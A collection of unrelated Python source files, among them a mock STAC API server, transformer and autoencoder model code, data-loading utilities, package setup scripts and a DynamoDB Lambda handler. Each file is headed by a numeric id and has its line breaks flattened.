import json from pathlib import Path from fastapi import FastAPI, Request from fastapi.middleware.cors import CORSMiddleware from fastapi.responses import RedirectResponse app = FastAPI() app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_methods=["*"], allow_headers=["*"], ) @app.get("/") def read_root(): return "Planetary Computer: Mock Edition™" @app.get("/api/stac/v1/search") def search(request: Request): print(request.query_params) return RedirectResponse( "https://planetarycomputer-staging.microsoft.com/api/stac/v1/search/?" + str(request.query_params) ) @app.get("/api/stac/v1/collections") def static_collections(): response = { "links": [ { "href": "https://planetarycomputer.microsoft.com/api/stac/v1/collections", "rel": "self", "type": "application/json" } ], "collections": [], } for path in Path("../data").glob("*.json"): with open(path) as f: response["collections"].append(json.load(f)) return response @app.get("/api/stac/v1/collections/{collection_id}/queryables") def static_collections(collection_id: str): with open(f"../data/{collection_id}/queryables.json") as f: return json.load(f)
440374
import torch import torch.nn as nn from Sublayers import FeedForward, MultiHeadAttention, Norm import numpy as np class EncoderLayer(nn.Module): def __init__(self, d_model, heads, dropout=0.1): super().__init__() self.norm_1 = Norm(d_model) self.norm_2 = Norm(d_model) self.attn = MultiHeadAttention(heads, d_model, dropout=dropout) self.ff = FeedForward(d_model, dropout=dropout) self.dropout_1 = nn.Dropout(dropout) self.dropout_2 = nn.Dropout(dropout) def forward(self, x, mask): x2 = self.norm_1(x) attn, concat_attn = self.attn(x2, x2, x2, mask) x = x + self.dropout_1(attn) x2 = self.norm_2(x) x = x + self.dropout_2(self.ff(x2)) return x, concat_attn # build a decoder layer with two multi-head attention layers and # one feed-forward layer class DecoderLayer(nn.Module): def __init__(self, opt, d_model, heads, dropout=0.1): super().__init__() self.use_cond2dec = opt.use_cond2dec self.use_cond2lat = opt.use_cond2lat self.norm_1 = Norm(d_model) self.norm_2 = Norm(d_model) self.norm_3 = Norm(d_model) self.dropout_1 = nn.Dropout(dropout) self.dropout_2 = nn.Dropout(dropout) self.dropout_3 = nn.Dropout(dropout) self.attn_1 = MultiHeadAttention(heads, d_model, dropout=dropout) self.attn_2 = MultiHeadAttention(heads, d_model, dropout=dropout) self.ff = FeedForward(d_model, dropout=dropout) def forward(self, x, e_outputs, cond_input, src_mask, trg_mask): x2 = self.norm_1(x) attn_1, concat_attn_1 = self.attn_1(x2, x2, x2, trg_mask) x = x + self.dropout_1(attn_1) x2 = self.norm_2(x) if self.use_cond2lat == True: cond_mask = torch.unsqueeze(cond_input, -2) cond_mask = torch.ones_like(cond_mask, dtype=bool) src_mask = torch.cat([cond_mask, src_mask], dim=2) attn_2, concat_attn_2 = self.attn_2(x2, e_outputs, e_outputs, src_mask) x = x + self.dropout_2(attn_2) x2 = self.norm_3(x) x = x + self.dropout_3(self.ff(x2)) return x, concat_attn_1, concat_attn_2
440401
import streamlit as st IMAGE_URL = "https://images.unsplash.com/photo-1548407260-da850faa41e3?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=1487&q=80" st.image(IMAGE_URL, caption="Sunrise by the mountains") st.write( """ #### Image credit: Creator: User _<NAME> (@neil_ingham)_ from _Unsplash_ License: Do whatever you want. https://unsplash.com/license URL: https://unsplash.com/photos/I2UR7wEftf4 """ )
440402
import torch.nn as nn class Model_FS(nn.Module): def __init__(self, basic_net): super(Model_FS, self).__init__() self.basic_net = basic_net self.basic_net.eval() def forward(self, inputs): outputs, _ = self.basic_net(inputs) return outputs
440438
from enum import Enum class ParameterLocation(str, Enum): """The places Parameters can be put when calling an Endpoint""" QUERY = "query" PATH = "path" HEADER = "header" COOKIE = "cookie"
440441
import sklearn from sklearn.feature_selection import RFE from sklearn.feature_selection import VarianceThreshold from sklearn.svm import SVR import textwrap import argparse import multiprocessing import pandas as pd import numpy as np import h5py import os,tqdm,pdb from itertools import product #from feature_selector import FeatureSelector print(sklearn.__version__) features=['base_q','length','mean','med','sd'] def get_chunk_size(M,N): assert all(type(x) is int for x in [M,N]) and M>N>0,"Please enter two positive integers and M>N" return np.array([(M//N)+1]*(M%N)+[M//N]*(N-(M%N))) def single_file(file_fn,folder_fn,progressbar): with h5py.File(os.path.join(folder_fn,file_fn[0]),'r') as h5: res=np.vstack([h5[key][10-7:11+7] for key in features]).flatten() base="".join(["ATCG"[np.argmax(x)] for x in h5['motif'][:].reshape(4,-1).T[10-7:11+7]]) progressbar.update(1) result=pd.Series(np.append(res,int(file_fn[0].split('_')[0])),dtype=object).append(pd.Series(base)) return result def worker(df,folder_fn,pid,q): progressbar = tqdm.tqdm(total=df.shape[0], desc='progress '+str(pid), position=pid) result=df.apply(single_file,args=(folder_fn,progressbar),axis=1) q.put(result) return None def Extract(args): print("start extract features") all_files=pd.read_csv(args.s,header=None) chunks=get_chunk_size(all_files.shape[0],args.p) with multiprocessing.Pool(processes = args.p) as pool: index=0 pid=1 q = multiprocessing.Manager().Queue() for i in chunks: w = pool.apply_async(worker,(all_files.iloc[index:index+i,:],args.i,pid,q)) index+=i pid+=1 pool.close() pool.join() header_df = pd.DataFrame(columns=[str(f)+"_"+str(p) for f in features for p in list(range(-7,8))]+["label"]+['motif']) header_df.to_csv(args.o,sep="\t",index=0) for i in range(q.qsize()) : values=q.get() values.to_csv(args.o ,mode='a',sep="\t",index=0,header=0) if __name__ == "__main__": description = textwrap.dedent(""" This script is a program to select best-n features of dataset We recommend that you execute the following sub-commands in order: Extract Extract RNN features from dataset Filter Remove features with low variance RFE SVM-FRE algorithm is used to select the best features lightGBM See 'python ./main.py {sub-command} -h' to read about a options details. """) parser = argparse.ArgumentParser( description=description, formatter_class=argparse.RawDescriptionHelpFormatter) subparsers = parser.add_subparsers(title="Sub-command",dest='command') parser_a = subparsers.add_parser('Extract',formatter_class=argparse.RawDescriptionHelpFormatter,help='Extract RNN features from dataset') parser_a.add_argument('-s',required=True, default=None, help=("txt file contains names of valid dataset files")) parser_a.add_argument('-i',required=True,default=None, help=("Abs path of valid dataset(*.hdf5)")) parser_a.add_argument('-p', default=32, help=("number of core used")) parser_a.add_argument('-o', default='./RNN_features.txt', help=("output file")) parser_a.set_defaults(func=Extract) args = parser.parse_args() args.func(args) # parser.add_argument('-m', '--model', default='SVM-RFE', # help=("Algorithms used to select features")) # parser.add_argument('-v', '--VarianceThreshold',default=0.8, # help=("Remove features with low variance or not(set 0)"))
440455
import os import numpy as np from keras import metrics from keras import backend as K from keras.models import Model from keras.layers import Input, Dense, Concatenate from keras.callbacks import CSVLogger, ModelCheckpoint from keras.utils import plot_model from src.model.autoencoder import AutoEncoder class AutoEncoderMultimodal(AutoEncoder): """ Multimodal Deep Denoising Autoencoder (DDAE) to encode audio-visual data --- Attributes ----------- name: str model name dimension_A/V1/V2/V3/V4: int input A/V data dimensionality noisy: bool whether or not to involve denoising fashion sparse: bool whether or not to involve sparsity decoder_A/V1/V2/V3/V4: keras.models.Model keras Model mapping latent representation to A/V input --------------------------------------- Functions ----------- build_model(): public build multimodal deep denoising autoencoder model train_model(): public train multimodal deep denoising autoencoder model encode(): public encode A/V input to latent representation decode(): public decode latent representation to A/V input """ def __init__(self, name, input_dim_A, input_dim_V1, input_dim_V2, input_dim_V3, input_dim_V4, noisy=True, sparse=False): AutoEncoder.__init__(self, name, input_dim_A+input_dim_V1+input_dim_V2+input_dim_V3, noisy=noisy, sparse=sparse) self.load_basic() self.name = '%s_hidden%.2f_batch%d_epoch%d_noise%s' % (name, self.hidden_ratio, self.batch_size, self.epochs, self.noise) self.dimension_A = input_dim_A self.dimension_V = input_dim_V1 + input_dim_V2 + input_dim_V3 + input_dim_V4 self.dimension_V1 = input_dim_V1 self.dimension_V2 = input_dim_V2 self.dimension_V3 = input_dim_V3 self.dimension_V4 = input_dim_V4 self.decoder_A = None self.decoder_V1 = None self.decoder_V2 = None self.decoder_V3 = None self.decoder_V4 = None def build_model(self): if not os.path.isdir(os.path.join(self.save_dir, self.name)): os.mkdir(os.path.join(self.save_dir, self.name)) self.fitted = False else: self.fitted = True if self.hidden_ratio != 1.0: hidden_dim_A = int(self.dimension_A * self.hidden_ratio) hidden_dim_V1 = int(self.dimension_V1 * self.hidden_ratio) hidden_dim_V2 = int(self.dimension_V2 * self.hidden_ratio) hidden_dim_V3 = int(self.dimension_V3 * self.hidden_ratio) hidden_dim_V4 = int(self.dimension_V4 * self.hidden_ratio) hidden_dim = int((self.dimension_A + self.dimension_V) * self.hidden_ratio / 4) else: hidden_dim_A = int(self.dimension_A * 0.75) hidden_dim_V1 = int(self.dimension_V1 * 0.75) hidden_dim_V2 = int(self.dimension_V2 * 0.75) hidden_dim_V3 = int(self.dimension_V3 * 0.75) hidden_dim_V4 = int(self.dimension_V4 * 0.75) hidden_dim = int((self.dimension_A + self.dimension_V) * 0.5) input_data_A = Input(shape=(self.dimension_A, ), name='audio_input') input_data_V1 = Input(shape=(self.dimension_V1, ), name='facial_input') input_data_V2 = Input(shape=(self.dimension_V2, ), name='gaze_input') input_data_V3 = Input(shape=(self.dimension_V3, ), name='pose_input') input_data_V4 = Input(shape=(self.dimension_V4, ), name='action_input') encoded_input = Input(shape=(hidden_dim, )) encoded_A = Dense(hidden_dim_A, activation='relu', kernel_initializer='he_uniform', name='audio_encoded')(input_data_A) encoded_V1 = Dense(hidden_dim_V1, activation='relu', kernel_initializer='he_uniform', name='facial_encoded')(input_data_V1) encoded_V2 = Dense(hidden_dim_V2, activation='relu', kernel_initializer='he_uniform', name='gaze_encoded')(input_data_V2) encoded_V3 = Dense(hidden_dim_V3, activation='relu', kernel_initializer='he_uniform', name='pose_encoded')(input_data_V3) encoded_V4 = Dense(hidden_dim_V4, activation='relu', kernel_initializer='he_uniform', name='action_encoded')(input_data_V4) shared = Concatenate(axis=1, name='concat')([encoded_A, encoded_V1, encoded_V2, encoded_V3, encoded_V4]) if self.sparse: encoded = Dense(hidden_dim, activation='relu', activity_regularizer=self.sparse_regularizer, name='shared_repres')(shared) else: encoded = Dense(hidden_dim, activation='relu', name='shared_repres')(shared) decoded_A = Dense(hidden_dim_A, activation='relu', name='audio_decoded')(encoded) decoded_V1 = Dense(hidden_dim_V1, activation='relu', name='facial_decoded')(encoded) decoded_V2 = Dense(hidden_dim_V2, activation='relu', name='gaze_decoded')(encoded) decoded_V3 = Dense(hidden_dim_V3, activation='relu', name='pose_decoded')(encoded) decoded_V4 = Dense(hidden_dim_V4, activation='relu', name='action_decoded')(encoded) decoded_A = Dense(self.dimension_A, activation='linear', name='audio_recon')(decoded_A) decoded_V1 = Dense(self.dimension_V1, activation='linear', name='facial_recon')(decoded_V1) decoded_V2 = Dense(self.dimension_V2, activation='linear', name='gaze_recon')(decoded_V2) decoded_V3 = Dense(self.dimension_V3, activation='linear', name='pose_recon')(decoded_V3) decoded_V4 = Dense(self.dimension_V4, activation='linear', name='action_recon')(decoded_V4) self.autoencoder = Model(inputs=[input_data_A, input_data_V1, input_data_V2, input_data_V3, input_data_V4], outputs=[decoded_A, decoded_V1, decoded_V2, decoded_V3, decoded_V4]) self.encoder = Model(inputs=[input_data_A, input_data_V1, input_data_V2, input_data_V3, input_data_V4], outputs=encoded) self.decoder_A = Model(inputs=encoded_input, outputs=self.autoencoder.get_layer('audio_recon')( self.autoencoder.get_layer('audio_decoded')( encoded_input))) self.decoder_V1 = Model(inputs=encoded_input, outputs=self.autoencoder.get_layer('facial_recon')( self.autoencoder.get_layer('facial_decoded')( encoded_input))) self.decoder_V2 = Model(inputs=encoded_input, outputs=self.autoencoder.get_layer('gaze_recon')( self.autoencoder.get_layer('gaze_decoded')( encoded_input))) self.decoder_V3 = Model(inputs=encoded_input, outputs=self.autoencoder.get_layer('pose_recon')( self.autoencoder.get_layer('pose_decoded')( encoded_input))) self.decoder_V4 = Model(inputs=encoded_input, outputs=self.autoencoder.get_layer('action_recon')( self.autoencoder.get_layer('action_decoded')( encoded_input))) # configure model # two combo ['adam' + 'mse] ['adadelta', 'binary_crossentropy'] self.autoencoder.compile(optimizer='adam', loss='mse', metrics=[metrics.mse, metrics.mse, metrics.mse, metrics.mse, metrics.mse], loss_weights=[0.35, 0.35, 0.1, 0.1, 0.1]) print("--" * 20) print("autoencoder") print(self.autoencoder.summary()) print("--" * 20) print("encoder") print(self.encoder.summary()) print("--" * 20) print("decoder (A)") print(self.decoder_A.summary()) print("--" * 20) plot_model(self.autoencoder, show_shapes=True, to_file=os.path.join(self.save_dir, self.name, 'multimodal_DDAE.png')) def train_model(self, X_train_A, X_train_V, X_dev_A, X_dev_V): if self.fitted: print("\nmodel already trained ---", self.name) self.load_model() return X_train_V1, X_train_V2, X_train_V3, X_train_V4 = self.separate_V(X_train_V) X_dev_V1, X_dev_V2, X_dev_V3, X_dev_V4 = self.separate_V(X_dev_V) X_train_A = np.vstack((X_train_A, X_dev_A)) X_train_V1 = np.vstack((X_train_V1, X_dev_V1)) X_train_V2 = np.vstack((X_train_V2, X_dev_V2)) X_train_V3 = np.vstack((X_train_V3, X_dev_V3)) X_train_V4 = np.vstack((X_train_V4, X_dev_V4)) if self.noisy: X_train_A_noisy = self.add_noise(X_train_A, self.noise) X_train_V1_noisy = self.add_noise(X_train_V1, self.noise) X_train_V2_noisy = self.add_noise(X_train_V2, self.noise) X_train_V3_noisy = self.add_noise(X_train_V3, self.noise) X_train_V4_noisy = self.add_noise(X_train_V4, self.noise) else: X_train_A_noisy = X_train_A X_train_V1_noisy = X_train_V1 X_train_V2_noisy = X_train_V2 X_train_V3_noisy = X_train_V3 X_train_V4_noisy = X_train_V4 assert X_train_A_noisy.shape == X_train_A.shape assert X_train_V1_noisy.shape == X_train_V1.shape assert X_train_V2_noisy.shape == X_train_V2.shape assert X_train_V3_noisy.shape == X_train_V3.shape assert X_train_V4_noisy.shape == X_train_V4.shape csv_logger = CSVLogger(os.path.join(self.save_dir, self.name, "logger.csv")) checkpoint = ModelCheckpoint(os.path.join(self.save_dir, self.name, "weights-improvement-{epoch:02d}-{loss:.2f}.hdf5"), monitor='loss', verbose=1, save_best_only=True, mode='min') callbacks_list = [csv_logger, checkpoint] self.autoencoder.fit([X_train_A_noisy, X_train_V1_noisy, X_train_V2_noisy, X_train_V3_noisy, X_train_V4_noisy], [X_train_A, X_train_V1, X_train_V2, X_train_V3, X_train_V4], epochs=self.epochs, batch_size=self.batch_size, shuffle=True, callbacks=callbacks_list) print("\nmodel trained and saved ---", self.name) self.save_model() def encode(self, X_train_A, X_train_V, X_dev_A, X_dev_V): """encode bimodal input to latent representation """ X_1_V1, X_1_V2, X_1_V3, X_1_V4 = self.separate_V(X_train_V) X_2_V1, X_2_V2, X_2_V3, X_2_V4 = self.separate_V(X_dev_V) encoded_train = self.encoder.predict([X_train_A, X_1_V1, X_1_V2, X_1_V3, X_1_V4]) encoded_dev = self.encoder.predict([X_dev_A, X_2_V1, X_2_V2, X_2_V3, X_2_V4]) self.save_representation(encoded_train, encoded_dev) self.decode(encoded_train, encoded_dev) def decode(self, encoded_train, encoded_dev): """decode latent representation to bimodal input """ decoded_train_A = self.decoder_A.predict(encoded_train) decoded_dev_A = self.decoder_A.predict(encoded_dev) self.save_reconstruction(decoded_train_A, decoded_dev_A, modality=True, no_modality=0) decoded_train_V1 = self.decoder_V1.predict(encoded_train) decoded_dev_V1 = self.decoder_V1.predict(encoded_dev) self.save_reconstruction(decoded_train_V1, decoded_dev_V1, modality=True, no_modality=1) decoded_train_V2 = self.decoder_V2.predict(encoded_train) decoded_dev_V2 = self.decoder_V2.predict(encoded_dev) self.save_reconstruction(decoded_train_V2, decoded_dev_V2, modality=True, no_modality=2) decoded_train_V3 = self.decoder_V3.predict(encoded_train) decoded_dev_V3 = self.decoder_V3.predict(encoded_dev) self.save_reconstruction(decoded_train_V3, decoded_dev_V3, modality=True, no_modality=3) decoded_train_V4 = self.decoder_V4.predict(encoded_train) decoded_dev_V4 = self.decoder_V4.predict(encoded_dev) self.save_reconstruction(decoded_train_V1, decoded_dev_V1, modality=True, no_modality=4)
440459
from distutils.core import setup from setuptools import find_packages setup( name='Amipy', version='1.0.0', url='https://github.com/01ly/Amipy', description='A micro asynchronous Python website crawler framework', # long_description=open('README.md').read(), author='linkin', maintainer='linkin', maintainer_email='<EMAIL> ', license='MIT', packages=find_packages(exclude=('tests', 'tests.*')), include_package_data=True, zip_safe=False, entry_points={ 'console_scripts': ['amipy = amipy.cmd:run'] }, install_requires=[ 'lxml', 'bs4', 'six>=1.5.2', 'bloompy>=0.1.1', ], classifiers=[ 'Environment :: Console', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Software Development :: Libraries :: Application Frameworks', 'Topic :: Software Development :: Libraries :: Python Modules', ], python_requires='>=3.5', )
440496
import os import numpy as np import data_utils BASE_DIR = os.path.dirname(os.path.abspath(__file__)) class PartDatasetPCN: def __init__(self, root, npoints=400, class_choice='Chair', split='train'): self.npoints = npoints self.cache = {} # caching the loaded parts cat, meta = data_utils.data_parse(os.path.join(root, 'synsetoffset2category.txt'), class_choice, root, split) self.datapath = [] for item in cat: for fn in meta[item]: self.datapath.append((item, fn[0], fn[1])) self.num_parts = data_utils.compute_num_of_parts(self.datapath) def __getitem__(self, index): if index in self.cache: parts_point_sets = self.cache[index] else: point_set, seg = data_utils.get_point_set_and_seg(self.datapath, index) point_set = data_utils.pc_normalize(point_set) parts_point_sets = [] for p in xrange(self.num_parts): part_points = np.where(seg == p) if len(part_points[0]) > 1: part_point_set = point_set[part_points] is_part_exist = True else: part_point_set = np.zeros((self.npoints, 3)) is_part_exist = False # normalized each part on its own if is_part_exist: norm_part_point_set = data_utils.pc_normalize(part_point_set) else: norm_part_point_set = part_point_set parts_point_sets.append((part_point_set, norm_part_point_set, is_part_exist)) self.cache[index] = parts_point_sets point_sets = [] for point_set, norm_part_point_set, is_full in parts_point_sets: # choose the right number of point by # randomly picking, if there are too many # or re-sampling, if there are less than needed point_set_length = len(point_set) if point_set_length >= self.npoints: point_set, choice = data_utils.choose_points(point_set, self.npoints) norm_part_point_set = norm_part_point_set[choice] else: extra_point_set, choice = data_utils.choose_points(point_set, self.npoints - point_set_length) point_set = np.append(point_set, extra_point_set, axis=0) norm_part_point_set = np.append(norm_part_point_set, norm_part_point_set[choice], axis=0) point_sets.append((point_set, norm_part_point_set, is_full)) return point_sets def __len__(self): return len(self.datapath) def get_number_of_parts(self): return self.num_parts if __name__ == '__main__': from utils import show3d_balls d = PartDatasetPCN(root=os.path.join(BASE_DIR, '../data/shapenetcore_partanno_segmentation_benchmark_v0'), class_choice='Chair', split='test') i = 27 point_sets = d[i] for p in xrange(d.get_number_of_parts()): ps, _, _ = point_sets[p] show3d_balls.showpoints(ps, ballradius=8)
440512
from starlette.requests import Request from streams_explorer.core.services.dataflow_graph import DataFlowGraph def get_dataflow_graph(request: Request) -> DataFlowGraph: return request.app.state.dataflow_graph
440517
from setuptools import setup setup( name='spoofbuz', version='1.0', description='A library for spoofing the Qobuz web player', author='DashLt', packages=['spoofbuz'], classifiers=['Programming Language :: Python :: 3', ] )
440530
from primehub import Helpful, cmd, Module class Me(Helpful, Module): @cmd(name='me', description='Get user information', return_required=True) def me(self) -> dict: """ Get account information :rtype: dict :returns: account information """ query = """ query { me { id username firstName lastName email isAdmin } } """ result = self.request({}, query) if 'data' in result and 'me' in result['data']: return result['data']['me'] return result def help_description(self): return "Show user account"
440577
import boto3 import json from datetime import datetime from decimal import Decimal HEADERS = {'Content-Type': 'application/json'} dynamodb = boto3.resource('dynamodb') table = dynamodb.Table('moodtracker_events') def handler(event, context): user_id = event['requestContext']['authorizer']['claims']['sub'] try: events = json.loads(event['body'], parse_float=Decimal) except json.JSONDecodeError as e: print(e) return { 'body': json.dumps({'error': 'Malformed request body'}), 'headers': HEADERS, 'statusCode': 400, } try: with table.batch_writer() as batch: for event in events: event['serverCreatedAt'] = datetime.utcnow().isoformat() event['userId'] = user_id batch.put_item(Item=event) return {'statusCode': 204} except Exception as e: print(e) return { 'body': json.dumps({'error': 'Internal server error'}), 'headers': HEADERS, 'statusCode': 500, }
440604
from torchtext.data import BucketIterator import torch def build(dataset, device, batch_size, is_train): device = None if device is None else torch.device(device) iterator = BucketIterator( dataset=dataset, batch_size=batch_size, repeat=False, sort_key=dataset.sort_key, sort=False, sort_within_batch=False, # shuffle batches shuffle=is_train, device=device, train=is_train ) return iterator
440606
def seq_search(lst, element): pos = 0 found = False while pos < len(lst) and not found: if lst[pos] == element: found = True else: pos += 1 return found arr = [1,2,3,4,5,56] print(seq_search(arr,3)) print(seq_search(arr,56)) print(seq_search(arr,1)) print(seq_search(arr,6))
440620
from typing import Any, Collection, List, Tuple, Union, Optional from ..models.heap_object import HeapObject, RenderOptions from ..models.options import Options from ..models.unique_identifier import UniqueIdentifier from .base_heap_object_factory import HeapObjectFactory class SequenceHeapObjectFactory(HeapObjectFactory): def __init__(self, obj: Union[Tuple, List], options: Options = None) -> None: super().__init__(obj, options) self._object_id = self.get_object_id(obj) self._max_len = (self.options.max_size or len(obj)) if self.options is not None else len(obj) self._render_options: Optional[RenderOptions] = None if (len(obj) > self._max_len): self._render_options = RenderOptions(True) self._object = obj[:self._max_len] def get_id(self) -> str: return self._object_id def get_value(self) -> str: return self.get_type() def get_objects_to_reduce(self) -> Union[None, Collection[Any]]: return self._object def create(self) -> HeapObject: heap_obj = HeapObject(self.get_id(), self.get_type(), self.get_value(), 'sequence', self._render_options) heap_obj.immutable = isinstance(self._object, tuple) heap_obj.references = [UniqueIdentifier(HeapObjectFactory.get_object_id(v)) for v in self._object] return heap_obj